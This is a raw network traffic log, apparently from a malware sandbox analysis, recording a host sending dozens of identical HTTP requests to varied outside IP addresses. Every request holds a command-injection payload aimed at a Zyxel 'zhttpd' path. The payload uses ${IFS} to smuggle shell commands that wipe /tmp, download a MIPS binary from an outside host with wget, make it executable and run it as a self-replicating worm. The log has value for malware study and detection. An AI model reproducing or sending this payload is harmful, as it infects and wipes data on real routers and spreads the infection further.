                              Mar 31, 2024 08:42:03.300828934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8216192.168.2.135053052.106.97.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300894022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8217192.168.2.1349442144.14.66.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:03.300909996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8218192.168.2.135448676.135.211.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306195021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8219192.168.2.135508091.73.35.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306251049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8220192.168.2.1339892221.67.28.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306284904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8221192.168.2.1349412145.5.181.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306341887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8222192.168.2.1343694161.186.95.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306391001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8223192.168.2.135163642.66.148.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306441069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8224192.168.2.133814693.227.113.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306492090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8225192.168.2.134463450.145.154.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306519032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8226192.168.2.1338788181.27.211.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306550026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8227192.168.2.135000674.121.60.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306581974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8228192.168.2.1335136112.65.87.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306632996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8229192.168.2.1352830207.211.167.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306675911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8230192.168.2.134092289.231.175.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306694031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8231192.168.2.135254854.238.243.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306725979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8232192.168.2.134408269.74.177.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306752920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8233192.168.2.1336806134.38.211.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306777000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8234192.168.2.1358628199.71.166.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306823015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8235192.168.2.135249470.205.136.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306850910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8236192.168.2.135744612.150.44.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306895971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8237192.168.2.1341764174.67.181.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306956053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8238192.168.2.1339312222.197.221.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.306992054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8239192.168.2.1359068207.27.165.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.307013988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8240192.168.2.1344278104.252.30.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.307025909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8241192.168.2.1358376156.54.124.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.307082891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8242192.168.2.1355660196.249.127.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.307113886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8243192.168.2.1337708140.207.31.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.307137966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8244192.168.2.1337982118.46.202.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.307157040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8245192.168.2.1353514191.250.189.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.307212114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8246192.168.2.1357170171.226.231.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:04.307549953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8247192.168.2.1336538207.94.199.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.311753035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8248192.168.2.136087691.127.145.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.311783075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8249192.168.2.1343962193.193.120.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.311810970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8250192.168.2.134904683.113.97.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.311853886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8251192.168.2.133949013.170.239.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.311933041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8252192.168.2.134049439.93.102.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.311944962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8253192.168.2.135096231.75.117.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.311979055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8254192.168.2.1337786135.151.106.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312026978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8255192.168.2.134349074.47.46.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312064886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8256192.168.2.1342766150.166.104.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312129021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8257192.168.2.1346596218.195.90.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312161922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8258192.168.2.1357996174.32.29.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312197924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8259192.168.2.134843261.84.206.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312241077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8260192.168.2.1348356210.170.159.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312273979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8261192.168.2.1346140148.103.59.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312314987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8262192.168.2.135239499.11.118.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312356949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8263192.168.2.133764296.36.71.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312403917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8264192.168.2.1357680123.106.199.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312443018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8265192.168.2.135854686.73.233.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312475920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8266192.168.2.135718819.35.38.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312521935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8267192.168.2.133303423.55.62.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312539101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8268192.168.2.135225889.11.50.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312568903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8269192.168.2.135104450.98.219.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312619925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8270192.168.2.1348490103.79.42.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312669992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8271192.168.2.136064858.166.110.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312714100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8272192.168.2.135244662.105.232.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312766075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8273192.168.2.135874086.102.217.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312791109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8274192.168.2.1344838193.219.81.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312822104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8275192.168.2.133414478.46.245.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312856913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8276192.168.2.1347950151.196.151.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312891006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8277192.168.2.1350514178.145.25.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312937021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8278192.168.2.1344010203.227.138.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.312980890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8279192.168.2.135723889.26.43.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.313019991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8280192.168.2.1354446183.200.164.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.313050032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8281192.168.2.1360104145.228.9.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.313085079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8282192.168.2.134090032.158.238.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.313143969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8283192.168.2.1339250143.170.225.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:05.313170910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8284192.168.2.135041895.187.49.209443
                              TimestampBytes transferredDirectionData
